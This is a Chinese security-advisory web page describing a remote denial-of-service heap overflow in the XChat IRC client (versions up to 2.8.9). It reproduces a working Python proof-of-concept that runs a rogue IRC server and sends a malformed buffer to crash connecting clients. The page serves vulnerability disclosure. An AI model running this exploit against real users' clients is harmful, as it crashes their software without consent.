Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / X-Chat畸形数据处理远程拒绝服务漏洞

发布日期:2011-11-25
更新日期:2011-11-29受影响系统:
XChat XChat 2.8.9
XChat XChat 2.8.7b
XChat XChat 2.8.6
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 50820X-Chat是一款免费开放源代码的IRC客户端。X-Chat在实现上存在远程拒绝服务漏洞,远程攻击者可利用此漏洞使应用程序崩溃,导致拒绝服务。<*来源:th3p4tri0t
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python# Exploit Title: XChat Heap Overflow DoS Proof of Concept
# Date: June 2011
# Author: th3p4tri0t
# Software Link: http://xchat.org/
# Version: <= 2.8.9# This only works on XChat on KDE, I"m not sure about windows.
# It has been tested on Ubuntu (failed), Kubuntu, and Bactrack 5
# It is a heap overflow and is some sort of error with X Windows
# It uses 1537 (this is the minimum) of the ascii value 20
# after this, an unknown number of any other character (did not check for special
# characters) is required to trigger a crash, presumably the payload will go here.# th3p4tri0timport socketprint "XChat PoC Exploit by th3p4tri0t "print "Creating server..."
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print "    [*] Binding to socket..."
sock.bind(("127.0.0.1", 6667))print "    [*] Listening on socket..."
sock.listen(5)print "    [*] Accepting connection..."
(target, address) = sock.accept()print "    [*] Sending payload..."
buffer = "hybrid7.debian.local "
buffer += chr(20) * 1537         # minimum required of this character
buffer += "A"*4000               # anything can go here and it still works.
buffer += " :* "target.send(buffer)target.close
sock.close建议:
--------------------------------------------------------------------------------
厂商补丁:XChat
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://xchat.org/Linux GNU Debugger “debug_gdb_scripts”加载任意代码执行漏洞Ubuntu 11.04内核升级 修复七个安全漏洞相关资讯      漏洞  X-Chat 
  • 快递官网漏洞泄露 1400 万用户信息  (08/12/2014 08:37:42)
  • 要389目录服务器访问绕过漏洞  (10/01/2012 09:18:08)
  • ASUS Net4Switch "ipswcom.dll"   (03/02/2012 09:32:42)
  • 软件漏洞是一笔大买卖!  (10/06/2012 08:28:32)
  • PHPCMS V9.1.13任意文件包含漏洞分  (08/01/2012 07:23:17)
  • Open Handset Alliance Android   (03/01/2012 06:59:34)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图